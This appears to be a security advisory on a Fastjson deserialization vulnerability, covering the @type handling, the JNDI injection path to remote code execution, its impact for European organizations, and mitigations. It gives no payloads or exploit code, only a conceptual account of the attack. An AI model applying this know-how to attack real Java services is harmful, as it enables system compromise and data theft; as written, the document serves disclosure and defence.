CVE-2025-70974 is a critical vulnerability in Alibaba's Fastjson library, a widely used Java JSON parser and serializer. The flaw stems from improper handling of the @type key in JSON input, which Fastjson uses to determine the Java class to instantiate during deserialization. Versions prior to 1.2.48 fail to properly restrict or validate the classes specified, allowing attackers to specify arbitrary Java classes. When these classes have public methods that can be invoked during deserialization, attackers can exploit this to perform JNDI injection by embedding malicious payloads elsewhere in the JSON document. JNDI injection can lead to remote code execution by causing the application to fetch and execute attacker-controlled code from LDAP or other JNDI-supported services. This vulnerability is a direct consequence of an incomplete remediation of CVE-2017-18349 and is related to CVE-2022-25845, which demonstrated bypass techniques. The CVSS v3.1 score of 10.0 reflects the vulnerability's ease of exploitation (no authentication or user interaction required), its network attack vector, and its severe impact on confidentiality, integrity, and availability. Exploitation can lead to full system compromise, data theft, or service disruption. Although no known exploits in the wild are reported at the time of publication, the criticality and history of exploitation of similar Fastjson vulnerabilities warrant immediate attention. The vulnerability affects all applications using vulnerable Fastjson versions, especially those exposed to untrusted JSON input, such as web services and APIs.

For European organizations, the impact of CVE-2025-70974 is severe. Exploitation can lead to remote code execution, allowing attackers to take full control of affected systems, steal sensitive data, disrupt services, or move laterally within networks. Industries with heavy reliance on Java applications and Fastjson, such as banking, telecommunications, healthcare, and government, face heightened risks. Compromise of critical infrastructure or sensitive personal data could result in regulatory penalties under GDPR and damage to reputation. The vulnerability's network accessibility and lack of authentication requirements increase the likelihood of automated exploitation attempts. Additionally, the widespread use of Fastjson in enterprise software and cloud services across Europe amplifies the potential attack surface. Organizations may also face challenges in detection and response due to the subtlety of deserialization attacks and the complexity of Java environments.

European organizations should immediately identify all instances of Fastjson in their environments, including transitive dependencies in third-party software. They must upgrade to Fastjson version 1.2.48 or later, where the vulnerability is fixed. If upgrading is not immediately feasible, organizations should implement strict input validation and disable autoType features or restrict allowed classes via Fastjson's white-listing mechanisms. Network-level controls such as web application firewalls (WAFs) should be configured to detect and block suspicious JSON payloads containing @type keys referencing dangerous classes. Monitoring and logging deserialization activities can help detect exploitation attempts. Security teams should conduct thorough code reviews and penetration testing focused on deserialization vulnerabilities. Additionally, organizations should ensure their incident response plans include scenarios involving deserialization attacks and JNDI injection. Vendor coordination is critical to ensure third-party applications are also patched promptly.